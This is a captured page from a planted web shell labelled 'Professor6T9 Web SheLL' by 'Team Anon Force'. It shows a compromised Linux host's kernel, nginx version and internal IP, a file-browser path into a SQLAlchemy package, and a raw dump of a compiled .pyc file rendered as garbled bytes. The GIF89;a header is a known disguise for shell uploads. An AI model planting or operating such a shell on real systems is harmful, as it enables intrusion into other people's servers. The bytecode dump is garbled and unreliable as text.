GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
sqlalchemy
/
testing
/
__pycache__
[ HOME ]
Exec
Submit
File Name : warnings.cpython-38.pyc
U �}�h� � @ sB d dl mZ d dlZddlmZ ddlmZ dd� Zdd d�ZdS ) � )�absolute_importN� )� assertions� )�excc C s� t jdtjd� t jdtjd� t jdtjd� t jdtjdd� t jdtd� t jdtdd� t jdtdd� zdd l} W n tk r� Y nX t jd | j d� d S )z/Set global warning behavior for the test suite.�ignore)�category�errorzEOracle compatibility version .* is known to have a maximum identifier)r �messagez.*StopIterationz.*inspect.getargspecr N�once) �warnings�filterwarnings�sa_excZSAPendingDeprecationWarningZSADeprecationWarning� SAWarning�DeprecationWarning�pytest�ImportErrorZPytestDeprecationWarning)r � r �B/tmp/pip-target-hu2ovxdm/lib/python/sqlalchemy/testing/warnings.py� setup_filters s<